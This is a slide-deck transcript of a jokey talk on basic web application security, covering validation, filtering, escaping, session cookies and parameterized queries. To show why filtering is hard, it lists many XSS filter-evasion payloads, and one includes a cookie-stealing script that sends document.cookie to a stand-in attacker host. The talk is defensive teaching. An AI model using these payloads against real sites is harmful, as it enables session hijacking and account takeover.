Basic Web Application Security. User Input Kick Your Arse.

transcript

Basic WebApplication

Security

User Input

Kick Your Arse

Three Ways(All Awesome)

Validation

Passive(No touchy-touchy)

This is a Number.

This is not a Number.

This is really not a Number.

Filtering

Destructive(One-Way Street)

Only letting the good stuff in.

Keeping out the bad stuff.

What’s the diff?(Bro.)

Both can be error-prone...

White-Listing Usability Problems

What happens whenyou screw it up?

Black-Listing Security Problems

(Always a trade-off.)

Escaping

TransportPoint A Point B

Data will be the same on both

sides.

Different Media,Different Escaping

Sam O’Brien

INSERT INTO mah_peeps (name)VALUES (‘Sam O\’Brien‘);

1, Sam O’Brien, 2010-09-02 18:30:00

XSS(Cross-Site Scripting)

(XTREME Site Scripting)

Sticking Scripts Where They

Don’t Belong.You there, down the back.

Stop sniggering.

</script>

Amateurs!

</script>

src=“http://badguys.net/logthis.php?d=‘+document.cookie+’”

style=“display:none;”>’);</script>

Oh shit.

Why is this uncool?

(Yeah! Why?)

Ooooh shit.

Oooooooooooh shit.

Oooooooooooooooooh shit.

Why is this really uncool?

(Because shut up.)

Hyper-Text Thingy I-forgot-again

Stateless

No Idea Who You Are.

It can guess.(Badly.)

IP AddressBrowser User-Agent

Sends a cookie with each request.

(A basket of goodies that the browser sends faithfully every

request.)

The Server puts a unique ID in

the basket.PHPSESSID=123your456mum

789__utma=12948.23.4211414.5

553is_a_furry=1

Browser sends the ID every

request.

PHPSESSID=123your456mum789

Look again.

THEY HAVE YOUR COOKIE.

Ooooooooooooooooooooooo-

Preventing Shenanigans

Validation Really Hard.

Filtering Still Really Hard.

Use a library, eg. HTML Purifier.

Escaping Dead Easy.

Most languages have stuff to handle this, eg.

htmlentities(), cgi.escape(), CGI.escape()

How hard is filtering?

(It’s just <script>, right?)

THIS HARD.

<img “””><script>alert('a')</script>”>

SRC=javascr

ipt:ale&#11

t('XSS')>

SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72

&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72

&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

(Well, then.)

<SCR\0IPT>alert('a')</SCR\0IPT>

<<SCRIPT>alert("a");//<</SCRIPT>

<SC<SCRIPT>RIPT>alert('a');</SC</SCRIPT>RIPT>

<SC\0RIPT SRC=http://foo/x.js?<B>

<img src=”javascript:alert('a')”

THIS HARD.

<STYLE>BODY{-moz-binding:url("http://foo/

x.xml#xss")}</STYLE>

(Well, then.)

žscriptualert(EXSSE)ž/scriptu (US-ASCII encoding evasion)

<META HTTP-EQUIV=”refresh”

CONTENT=”0;url=javascript:alert('a');”>

<META HTTP-EQUIV="refresh"

CONTENT="0;url=data:text/html;base64,

PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<FRAMESET><FRAME

SRC="javascript:alert('XSS');"></FRAMESET>

THIS HARD.<DIV STYLE="background-image:

url(javascript:alert('a'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\

\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\

\006c\

0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\

0029">

<DIV STYLE="background-image:

url(javascript:alert('a'))">

<STYLE>@im\port'\ja\vasc\ript:alert("a")';</STYLE>

exp/*<A

STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/

*/pression(alert("a"))'>

<STYLE TYPE="text/javascript">alert('a');</STYLE>

(Well, then.)

<STYLE>.x{background-

image:url("javascript:alert('a')");}</STYLE><A

CLASS=X></A>

<OBJECT TYPE="text/x-scriptlet"

DATA="http://foo/x.html"></OBJECT>

<EMBED SRC="http://foo/xss.swf"

AllowScriptAccess="always"></EMBED>

<EMBED

SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzd

....jwvc3ZnPg=="

type="image/svg+xml"

AllowScriptAccess="always"></EMBED>

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><!

[CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C

DATAFORMATAS=HTML></SPAN>

One more thing about XSS.

(Groan.)

Remember <script>alert()</script>

(Yes, I do. Shut up.)

alert() can be ANY JAVASCRIPT.

(Yes, and...?)

Do you have any forms on your page?

(Yes.)

Do you have any javascript functions your site uses to do anything

useful?

(... Yes.)

Do your site make any AJAX calls to do anything useful?

(... Oh.)

That injected code can trigger forms, run

javascript functions, or make AJAX calls.

(... Oooooh.)

Send someone to a link that looks like:

http://my.site/?user=<script>doStuff();</script>

(... Oooooooooh.)

Or store something that will output this on someone’s profile

(... Oooooooooooooooh.)

... And you’re hosed.

(Shit.)

The Human Element

Touchy-Feely Commie Bullshit.

We are very fallible.

We will forget things.

When time gets short, we take the easy path.

Design systems so that they naturally

encourage security.

Insert(“INSERT INTOposts VALUES

(‘”.sql_safe($title).”’, ‘“.sql_safe($content).”’,

‘”.sql_safe($author).”’)”);

insert(“INSERT INTOposts VALUES

(:title, :content, :author)”,$title, $content, $author);

<h3><%= title %> - <%= date %><h3><div><%= raw(post_body) %></div><p>Written by <%= author %></p>

<div><?=$post_body;?></div><p>Written by <?

=htmlentities($author);?></p>

Questions?

Now get out.

Basic Web Application Security. User Input Kick Your Arse.

Documents